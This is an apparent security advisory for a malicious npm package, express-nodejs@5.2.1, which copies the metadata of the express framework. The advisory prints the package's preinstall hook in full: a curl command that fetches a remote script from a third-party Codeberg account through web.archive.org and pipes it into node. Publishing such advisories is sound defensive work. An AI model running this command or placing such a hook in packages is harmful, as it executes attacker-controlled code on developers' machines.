express-nodejs@5.2.1
Vulnerability report · Last retrieved from osv.dev September 29, 2026 at 3:09 PM UTC
OSV ID
MAL-2026-17243
Ecosystem
npm
Summary
express-nodejs@5.2.1 typosquats the express framework: package.json copies express's description, author (TJ Holowaychuk), repository (expressjs/express), and homepage while publishing under a different name. The package.json preinstall lifecycle hook runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, piping a script fetched from an unrelated third-party Codeberg account (hellscripter/install-scripts) on a mutable branch, laundered through web.archive.org, directly into the node interpreter on the installer's host. This executes arbitrary attacker-controlled code at npm install time with no pinning, no integrity check, and no relationship to the express project. The fetched payload is mutable and its contents are not shipped in the tarball.
Source: amazon-inspector (9aea7dd76028cd443cf2f8d58fa5d8b3b28bb6db870f34d1cc6dad28db92fe93)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.